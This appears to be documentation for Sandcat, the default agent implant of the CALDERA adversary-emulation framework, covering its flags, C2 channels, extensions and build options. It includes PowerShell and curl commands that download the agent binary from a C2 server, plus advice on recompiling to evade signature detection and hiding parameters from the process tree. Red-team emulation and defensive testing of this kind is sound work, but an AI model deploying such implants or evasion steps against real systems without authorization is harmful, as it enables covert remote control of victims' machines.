Sandcat Plugin Details
The Sandcat plugin provides CALDERA with its default agent implant, Sandcat. The agent is written in GoLang for cross-platform compatibility and can currently be compiled to run on Windows, Linux, and MacOS targets.
While the CALDERA C2 server requires GoLang to be installed in order to compile agent binaries, no installation is required on target machines - the agent program will simply run as an executable.
sandcat plugin does come with precompiled binaries, but these only contain the basic
agent features and are more likely to be flagged by AV as they are publicly available on GitHub.
If you wish to dynamically compile agents to produce new hashes or include additional agent features, the C2 server must have GoLang installed.
The source code for the sandcat agent is located in the
gocat contains the core agent code, which provides all of the basic features.
gocat-extensions contains source code for extensions that can be compiled into new agent binaries on demand.
The extensions are kept separate to keep the agent lightweight and to allow more flexibility when catering to
various use cases.
Precompiled agent binaries are located in the
payloads directory and are referenced with the following filename:
sandcat.go-darwincompiled binary for Mac targets
sandcat.go-linuxcompiled binary for Linux targets
sandcat.go-windowscompiled binary for Windows targets.
These files get updated when dynamically compiling agents, so they will always contain the latest compiled version on your system.
To deploy Sandcat, use one of the built-in delivery commands from the main server GUI which allows you to run the agent on Windows, Mac, or Linux.
Each of these commands downloads a compiled Sandcat executable from CALDERA and runs it immediately.
Once the agent is running, it should show log messages when it beacons into CALDERA.
If you have GoLang installed on the CALDERA server, each time you run one of the delivery commands above, the agent will re-compile itself dynamically to obtain a new file hash. This will help bypass file-based signature detections.
When running the Sandcat agent binary, there are optional parameters you can use when you start the executable:
-server [C2 endpoint]: This is the location (e.g. HTTP URL, IPv4:port string) that the agent will use to reach the C2 server. (e.g.
-server https://example.com). The agent must have connectivity to this endpoint.
-group [group name]: This is the group name that you would like the agent to join when it starts. The group does not have to exist beforehand. A default group of
redwill be used if this option is not provided (e.g.
-v: Toggle verbose output from sandcat. If this flag is not set, sandcat will run silently. This only applies to output that would be displayed on the target machine, for instance if running sandcat from a terminal window. This option does not affect the information that gets sent to the C2 server.
-httpProxyGateway [gateway]: Sets the HTTP proxy gateway if running Sandcat in environments that use proxies to reach the internet
-paw [identifier]: Optionally assign the agent with an identifier value. By default, the agent will be assigned a random identifier by the C2 server.
-c2 [C2 method name]: Instruct the agent to connect to the C2 server using the given C2 communication method. By default, the agent will use HTTP(S). The following C2 channels are currently supported:
-c2 HTTP, or simply exclude the
DNS Tunneling (
-c2 DnsTunneling): requires the agent to be compiled with the DNS tunneling extension.
-c2 FTP): requires the agent to be compiled with the FTP extension
Github GIST (
-c2 GIST): requires the agent to be compiled with the Github Gist extension
-c2 Slack): requires the agent to be compiled with the Slack extension
SMB Pipes (
-c2 SmbPipe): allows the agent to connect to another agent peer via SMB pipes to route traffic through an agent proxy to the C2 server. Cannot be used to connect directly to the C2. Requires the agent to be compiled with the
proxy_smb_pipeSMB pipe extension.
-delay [number of seconds]: pause the agent for the specified number of seconds before running
-listenP2P: Toggle peer-to-peer listening mode. When enabled, the agent will listen for and accept peer-to-peer connections from other agents. This feature can be leveraged in environments where users want agents within an internal network to proxy through another agent in order to connect to the C2 server.
-originLinkID [link ID]: associated the agent with the operation instruction with the given link ID. This allows the C2 server to map out lateral movement by determining which operation instructions spawned which agents.
Additionally, the sandcat agent can tunnel its communications to the C2 using the following options (for more details, see the C2 tunneling documentation
In order to keep the agent code lightweight, the default Sandcat agent binary ships with limited basic functionality. Users can dynamically compile additional features, referred to as “gocat extensions”. Each extension is temporarily added to the existing core sandcat code to provide functionality such as peer-to-peer proxy implementations, additional executors, and additional C2 communication protocols.
To request particular extensions, users must include the
gocat-extensions HTTP header when asking the C2 to compile an agent.
The header value must be a comma-separated list of requested extensions.
The server will include the extensions in the binary if they exist and if their dependencies are met (i.e. if the extension requires a particular
GoLang module that is not installed on the server, then the extension will not be included).
Below is an example PowerShell snippet to request the C2 server to include the
$url="http://192.168.137.1:8888/file/download"; # change server IP/port as needed $wc=New-Object System.Net.WebClient; $wc.Headers.add("platform","windows"); # specifying Windows build $wc.Headers.add("file","sandcat.go"); # requesting sandcat binary $wc.Headers.add("gocat-extensions","proxy_http,shells"); # requesting the extensions $output="C:\Users\Public\sandcat.exe"; # specify destination filename $wc.DownloadFile($url,$output); # download
The following features are included in the stock default agent:
HTTPC2 contact protocol for HTTP(S)
pshPowerShell executor (Windows)
cmdcmd.exe executor (Windows)
shshell executor (Linux/Mac)
procexecutor to directly spawn processes from executables without needing to invoke a shell (Windows/Linux/Mac)
SSH tunneling to tunnel traffic to the C2 server.
Additional functionality can be found in the following agent extensions:
C2 Communication Extensions
gist: provides the Github Gist C2 contact protocol. Requires the following GoLang modules:
dns_tunneling: provides the DNS tunneling C2 communication protocol. Requires the following GoLang modules:
ftp: provides the FTP C2 communication protocol. Requires the following GoLang modules:
slack: provides the Slack C2 communication protocol.
proxy_http: allows the agent to accept peer-to-peer messages via HTTP. Not required if the agent is simply using HTTP to connect to a peer (acts the same as connecting direclty to the C2 server over HTTP).
proxy_smb_pipe: provides the
SmbPipepeer-to-peer proxy client and receiver for Windows (peer-to-peer communication via SMB named pipes).
shells: provides the
pwsh(Windows powershell core), and Python (
shellcode: provides the shellcode executors.
native: provides basic native execution functionality, which leverages GoLang code to perform tasks rather than calling external binaries or commands.
native_aws: provides native execution functionality specific to AWS. Does not require the
nativeextension, but does require the following GoLang modules:
donut: provides the Donut functionality to execute certain .NET executables in memory. See https://github.com/TheWover/donut for additional information.
sharedextension provides the C sharing functionality for Sandcat. This can be used to compile Sandcat as a DLL rather than a
.exefor Windows targets.
Exit codes returned from Sandcat vary across executors. Typical shell executors will return the exit code provided by the shell. Certain executor extensions will return values hard-coded in Sandcat.
Sandcat includes general exit codes which may be utilized by executors, overriden by executors, or used in error cases. The following values describe general Sandcat exit codes:
-1: Error (e.g., cannot decode command, payload not available)
The following values describe exit codes utilized by specific executors:
shells: Returns the exit code provided by the OS/shell.
shellcode: Utilizes the general Sandcat exit codes.
1: Process error (e.g., error while executing code)
2: Input error (e.g., invalid parameters)
donut: Returns the exit code provided by the OS/shell.
Customizing Default Options & Execution Without CLI Options
It is possible to customize the default values of these options when pulling Sandcat from the CALDERA server.
This is useful if you want to hide the parameters from the process tree or if you cannot specify arguments when executing the agent binary.
You can do this by passing the values in as headers when requesting the agent binary from the C2 server instead of as parameters when executing the binary.
The following parameters can be specified this way:
For example, the following will download a linux executable that will use
http://10.0.0.2:8888 as the server address
http://localhost:8888, will set the group name to
mygroup instead of the default
red, and will enable the P2P listener:
curl -sk -X POST -H 'file:sandcat.go' -H 'platform:linux' -H 'server:http://10.0.0.2:8888' -H 'group:mygroup' -H 'listenP2P:true' http://localhost:8888/file/download > sandcat
Additionally, if you want the C2 server to compile the agent with a built-in list of known peers (agents that are actively listening for peer-to-peer requests), you can do so with the following header:
includeProxyPeers:all- include all peers, regardless of what proxy methods they are listening on
includeProxypeers:SmbPipe- only include peers listening for SMB pipe proxy traffic
includeProxypeers:HTTP- only include peers listening for HTTP proxy traffic.